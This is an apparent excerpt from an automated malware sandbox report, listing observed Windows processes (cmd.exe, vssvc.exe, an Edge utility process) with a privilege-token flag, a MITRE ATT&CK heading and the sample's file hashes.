C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵PID:1472
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4092 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:81⤵PID:4136
Network
MITRE ATT&CK Enterprise v15
Filesize 4KB
MD5 6fedb1c2ef1dde2da864bf98b271675b
SHA1 1393fd16b3c6468e6dbd009e90644d51eaff7ecb
SHA256 c2ec79ee0c21c94c4c68339e5e569ef2e8d2d716fe3b9ba22070699b6a2499ca
SHA512 5f3f2c1f4dc7a7761c70dd996a152616d8a948e577ff451330df6f8aa0349fad5c82b021f73fa3d880a647094a6fb217c14c11ffee925a11136af8bb139d8e64